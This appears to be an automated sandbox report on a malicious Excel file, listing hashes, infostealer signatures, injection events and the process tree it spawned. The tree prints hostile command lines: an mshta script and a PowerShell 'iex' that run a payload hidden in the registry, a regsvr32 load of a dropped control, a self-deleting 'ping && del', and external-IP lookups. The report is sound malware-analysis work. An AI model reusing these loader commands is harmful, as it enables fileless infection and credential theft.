Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows10_x64 -
resource
win10 -
submitted
14-07-2020 05:18
Static task
static1
Behavioral task
behavioral1
Sample
tr_4.xls
Resource
win7
General
-
Target
tr_4.xls
-
Size
90KB
-
MD5
4cabdfd852c1c7fe830508cec8dd0982
-
SHA1
ee530e442bdf28a4834bca1922be2dd54761c6d5
-
SHA256
7bbbb364b218aa3da80f1c8e8e43e389a71811dcf1d1fe63be8e7a85a3ac0fd0
-
SHA512
a6ec25d43a123a9a9b7f5005a7acd7b9bad3f3142f0b29d9c43b993fabec22e8926f29f324e85a050ed832a2c4c594802906705ed89ac7460e818188c0b8cd2a
Malware Config
Signatures
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 3376 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 2232 cmd.exe 3020 Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious use of WriteProcessMemory 76 IoCs
Processes:
EXCEL.EXEregsvr32.exeregsvr32.exesvchost.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.exedescription pid process target process PID 3684 wrote to memory of 2588 3684 EXCEL.EXE regsvr32.exe PID 3684 wrote to memory of 2588 3684 EXCEL.EXE regsvr32.exe PID 2588 wrote to memory of 2640 2588 regsvr32.exe regsvr32.exe PID 2588 wrote to memory of 2640 2588 regsvr32.exe regsvr32.exe PID 2588 wrote to memory of 2640 2588 regsvr32.exe regsvr32.exe PID 2640 wrote to memory of 1008 2640 regsvr32.exe svchost.exe PID 2640 wrote to memory of 1008 2640 regsvr32.exe svchost.exe PID 2640 wrote to memory of 1008 2640 regsvr32.exe svchost.exe PID 2640 wrote to memory of 1008 2640 regsvr32.exe svchost.exe PID 2640 wrote to memory of 1008 2640 regsvr32.exe svchost.exe PID 1008 wrote to memory of 1204 1008 svchost.exe cmd.exe PID 1008 wrote to memory of 1204 1008 svchost.exe cmd.exe PID 1008 wrote to memory of 1204 1008 svchost.exe cmd.exe PID 1008 wrote to memory of 1492 1008 svchost.exe svchost.exe PID 1008 wrote to memory of 1492 1008 svchost.exe svchost.exe PID 1008 wrote to memory of 1492 1008 svchost.exe svchost.exe PID 1008 wrote to memory of 1492 1008 svchost.exe svchost.exe PID 1008 wrote to memory of 1492 1008 svchost.exe svchost.exe PID 1008 wrote to memory of 1756 1008 svchost.exe BN2D25.tmp PID 1008 wrote to memory of 1756 1008 svchost.exe BN2D25.tmp PID 1008 wrote to memory of 1756 1008 svchost.exe BN2D25.tmp PID 1900 wrote to memory of 4004 1900 iexplore.exe IEXPLORE.EXE PID 1900 wrote to memory of 4004 1900 iexplore.exe IEXPLORE.EXE PID 1900 wrote to memory of 4004 1900 iexplore.exe IEXPLORE.EXE PID 1900 wrote to memory of 3448 1900 iexplore.exe IEXPLORE.EXE PID 1900 wrote to memory of 3448 1900 iexplore.exe IEXPLORE.EXE PID 1900 wrote to memory of 3448 1900 iexplore.exe IEXPLORE.EXE PID 3732 wrote to memory of 3376 3732 mshta.exe powershell.exe PID 3732 wrote to memory of 3376 3732 mshta.exe powershell.exe PID 3376 wrote to memory of 4024 3376 powershell.exe csc.exe PID 3376 wrote to memory of 4024 3376 powershell.exe csc.exe PID 4024 wrote to memory of 1160 4024 csc.exe cvtres.exe PID 4024 wrote to memory of 1160 4024 csc.exe cvtres.exe PID 3376 wrote to memory of 912 3376 powershell.exe csc.exe PID 3376 wrote to memory of 912 3376 powershell.exe csc.exe PID 912 wrote to memory of 3184 912 csc.exe cvtres.exe PID 912 wrote to memory of 3184 912 csc.exe cvtres.exe PID 3376 wrote to memory of 3020 3376 powershell.exe Explorer.EXE PID 3376 wrote to memory of 3020 3376 powershell.exe Explorer.EXE PID 3376 wrote to memory of 3020 3376 powershell.exe Explorer.EXE PID 3376 wrote to memory of 3020 3376 powershell.exe Explorer.EXE PID 3020 wrote to memory of 3392 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3392 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 2232 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2232 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2232 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 3392 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 3392 3020 Explorer.EXE RuntimeBroker.exe PID 3020 wrote to memory of 1900 3020 Explorer.EXE iexplore.exe PID 3020 wrote to memory of 1900 3020 Explorer.EXE iexplore.exe PID 3020 wrote to memory of 2232 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 2232 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 1900 3020 Explorer.EXE iexplore.exe PID 3020 wrote to memory of 1900 3020 Explorer.EXE iexplore.exe PID 2232 wrote to memory of 484 2232 cmd.exe PING.EXE PID 2232 wrote to memory of 484 2232 cmd.exe PING.EXE PID 2232 wrote to memory of 484 2232 cmd.exe PING.EXE PID 2232 wrote to memory of 484 2232 cmd.exe PING.EXE PID 2232 wrote to memory of 484 2232 cmd.exe PING.EXE PID 3020 wrote to memory of 3464 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 3464 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 3480 3020 Explorer.EXE cmd.exe PID 3020 wrote to memory of 3480 3020 Explorer.EXE cmd.exe PID 3480 wrote to memory of 1964 3480 cmd.exe nslookup.exe -
Suspicious behavior: EnumeratesProcesses 1925 IoCs
Processes:
svchost.exeWerFault.exepowershell.exeExplorer.EXEpid process 1008 svchost.exe 1008 svchost.exe 1008 svchost.exe 1008 svchost.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 2144 WerFault.exe 3376 powershell.exe 3376 powershell.exe 3376 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 1900 iexplore.exe 1900 iexplore.exe 1900 iexplore.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
regsvr32.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2588 3684 regsvr32.exe EXCEL.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 484 PING.EXE -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 api.ipify.org -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e000000000200000000001066000000010000200000001dc10b9fcb208765dc969b4aae92b9946bef5876cf0049d0a39afd28ae0314ee000000000e8000000002000020000000334af263d50e7a114471d712a6d375267d6d1ecb470d44adc947234d3f30bc3220000000dc61a61c13057443b26e84d9802dd468c1c475f2cf2ab4d0454d01db53bd946f400000005c1e247038f826d817b24a7ed1b93d0f56442913c60e424366d34ea5ef5817df025ec372b64a820c92c28b2174e141c636980d4bf36d1ce08298c66aa5b30a7d iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1331368771" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1331368771" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e000000000200000000001066000000010000200000006d189d088721c3c5363e11dee78f8a4af99f0c229955448ec93d04ca29846aea000000000e8000000002000020000000dc5714673a6dd1d132ae13de6733967f1996f467cd877da6899bc114afd1c6e12000000018cdd95b91b4a7e992e8e42e6bc39c231b4f05070011d4d2f6820d61a43d5ed0400000007caf2a0516d2d9fb1b88fb94e65730b391c60ffc40d147d6842454a3a986ad5007b68cb6ed281128d3f2b63334a3de79f8ae879b71c5c2ab4438830e2f81c02b iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8090f33f9e59d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824862" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824862" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824862" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1334025718" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7ADE757F-C591-11EA-95F0-C69595AB4A8B} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1014e9409e59d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1334025718" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824862" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe -
Suspicious use of SetWindowsHookEx 24 IoCs
Processes:
EXCEL.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 3684 EXCEL.EXE 1900 iexplore.exe 1900 iexplore.exe 4004 IEXPLORE.EXE 4004 IEXPLORE.EXE 1900 iexplore.exe 1900 iexplore.exe 3448 IEXPLORE.EXE 3448 IEXPLORE.EXE 1900 iexplore.exe 1900 iexplore.exe 4004 IEXPLORE.EXE 4004 IEXPLORE.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3684 EXCEL.EXE -
Checks for installed software on the system 1 TTPs 7 IoCs
Processes:
svchost.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName svchost.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe -
Executes dropped EXE 1 IoCs
Processes:
BN2D25.tmppid process 1756 BN2D25.tmp -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2144 2640 WerFault.exe regsvr32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Checks whether UAC is enabled 3 IoCs
Processes:
IEXPLORE.EXEIEXPLORE.EXEiexplore.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe -
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 2640 regsvr32.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
regsvr32.exesvchost.exepowershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2640 set thread context of 1008 2640 regsvr32.exe svchost.exe PID 1008 set thread context of 1492 1008 svchost.exe svchost.exe PID 3376 set thread context of 3020 3376 powershell.exe Explorer.EXE PID 3020 set thread context of 3392 3020 Explorer.EXE RuntimeBroker.exe PID 3020 set thread context of 2232 3020 Explorer.EXE cmd.exe PID 3020 set thread context of 1900 3020 Explorer.EXE iexplore.exe PID 2232 set thread context of 484 2232 cmd.exe PING.EXE PID 3020 set thread context of 2332 3020 Explorer.EXE WinMail.exe -
Suspicious use of AdjustPrivilegeToken 96 IoCs
Processes:
svchost.exesvchost.exedescription pid process Token: SeImpersonatePrivilege 1008 svchost.exe Token: SeTcbPrivilege 1008 svchost.exe Token: SeChangeNotifyPrivilege 1008 svchost.exe Token: SeCreateTokenPrivilege 1008 svchost.exe Token: SeBackupPrivilege 1008 svchost.exe Token: SeRestorePrivilege 1008 svchost.exe Token: SeIncreaseQuotaPrivilege 1008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1008 svchost.exe Token: SeImpersonatePrivilege 1008 svchost.exe Token: SeTcbPrivilege 1008 svchost.exe Token: SeChangeNotifyPrivilege 1008 svchost.exe Token: SeCreateTokenPrivilege 1008 svchost.exe Token: SeBackupPrivilege 1008 svchost.exe Token: SeRestorePrivilege 1008 svchost.exe Token: SeIncreaseQuotaPrivilege 1008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1008 svchost.exe Token: SeImpersonatePrivilege 1008 svchost.exe Token: SeTcbPrivilege 1008 svchost.exe Token: SeChangeNotifyPrivilege 1008 svchost.exe Token: SeCreateTokenPrivilege 1008 svchost.exe Token: SeBackupPrivilege 1008 svchost.exe Token: SeRestorePrivilege 1008 svchost.exe Token: SeIncreaseQuotaPrivilege 1008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1008 svchost.exe Token: SeImpersonatePrivilege 1008 svchost.exe Token: SeTcbPrivilege 1008 svchost.exe Token: SeChangeNotifyPrivilege 1008 svchost.exe Token: SeCreateTokenPrivilege 1008 svchost.exe Token: SeBackupPrivilege 1008 svchost.exe Token: SeRestorePrivilege 1008 svchost.exe Token: SeIncreaseQuotaPrivilege 1008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1008 svchost.exe Token: SeImpersonatePrivilege 1008 svchost.exe Token: SeTcbPrivilege 1008 svchost.exe Token: SeChangeNotifyPrivilege 1008 svchost.exe Token: SeCreateTokenPrivilege 1008 svchost.exe Token: SeBackupPrivilege 1008 svchost.exe Token: SeRestorePrivilege 1008 svchost.exe Token: SeIncreaseQuotaPrivilege 1008 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1008 svchost.exe Token: SeImpersonatePrivilege 1492 svchost.exe Token: SeTcbPrivilege 1492 svchost.exe Token: SeChangeNotifyPrivilege 1492 svchost.exe Token: SeCreateTokenPrivilege 1492 svchost.exe Token: SeBackupPrivilege 1492 svchost.exe Token: SeRestorePrivilege 1492 svchost.exe Token: SeIncreaseQuotaPrivilege 1492 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1492 svchost.exe Token: SeImpersonatePrivilege 1492 svchost.exe Token: SeTcbPrivilege 1492 svchost.exe Token: SeChangeNotifyPrivilege 1492 svchost.exe Token: SeCreateTokenPrivilege 1492 svchost.exe Token: SeBackupPrivilege 1492 svchost.exe Token: SeRestorePrivilege 1492 svchost.exe Token: SeIncreaseQuotaPrivilege 1492 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1492 svchost.exe Token: SeImpersonatePrivilege 1492 svchost.exe Token: SeTcbPrivilege 1492 svchost.exe Token: SeChangeNotifyPrivilege 1492 svchost.exe Token: SeCreateTokenPrivilege 1492 svchost.exe Token: SeBackupPrivilege 1492 svchost.exe Token: SeRestorePrivilege 1492 svchost.exe Token: SeIncreaseQuotaPrivilege 1492 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1492 svchost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tr_4.xls"2⤵
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
-
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /s /i dDdoiBj.ocx3⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\regsvr32.exe/s /i dDdoiBj.ocx4⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe5⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Checks for installed software on the system
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /K6⤵
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BN2D25.tmpC:\Users\Admin\AppData\Local\Temp\BN2D25.tmp6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 6685⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))3⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2uf0qoog\2uf0qoog.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9277.tmp" "c:\Users\Admin\AppData\Local\Temp\2uf0qoog\CSC34BDC6584AD24D90853E8CE642A0B1BC.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mswhtq3l\mswhtq3l.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9313.tmp" "c:\Users\Admin\AppData\Local\Temp\mswhtq3l\CSC34B0182361C643F483B2E23F8A9FC592.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN2D25.tmp"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\1ACE.bi1"2⤵
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\D3E.bi1"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\1ACE.bi1"2⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\D3E.bi1"2⤵
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1900 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
-
